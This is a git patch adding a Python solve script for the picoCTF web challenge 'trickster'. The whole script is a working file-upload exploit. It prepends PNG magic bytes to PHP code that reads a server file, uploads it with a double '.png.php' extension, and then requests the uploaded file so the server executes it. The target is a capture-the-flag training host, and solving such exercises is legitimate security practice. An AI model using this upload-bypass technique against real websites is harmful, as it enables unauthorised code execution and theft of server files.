From 20a447923afde6e4ce594703a2964be9bf240fc1 Mon Sep 17 00:00:00 2001
From: h7x4 <h7x4@nani.wtf>
Date: Thu, 5 Sep 2024 19:54:46 +0200
Subject: [PATCH] web/trickster

---
 web/trickster/solve.py | 31 +++++++++++++++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100755 web/trickster/solve.py

diff --git a/web/trickster/solve.py b/web/trickster/solve.py
new file mode 100755
index 0000000..5b93f30
--- /dev/null
+++ b/web/trickster/solve.py
@@ -0,0 +1,31 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -i python3 -p python3 python3Packages.requests
+
+import requests
+
+BASE_URL = "http://atlas.picoctf.net:65066"
+
+def main():
+    PNG_HEADER = bytes([0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A])
+    payload =  PNG_HEADER + b'''
+    <?php
+      echo(file_get_contents("../GQ4DOOBVMMYGK.txt"))
+    ?>
+    '''
+
+    requests.post(
+        BASE_URL + "/",
+        files = {
+            'file': ('payload.png.php', payload),
+            'submit': 'Upload File',
+        }
+    )
+
+    # Found through /robots.txt
+    res = requests.get(BASE_URL + "/uploads/payload.png.php")
+
+    print(res)
+    print(res.text)
+
+if __name__ == '__main__':
+    main()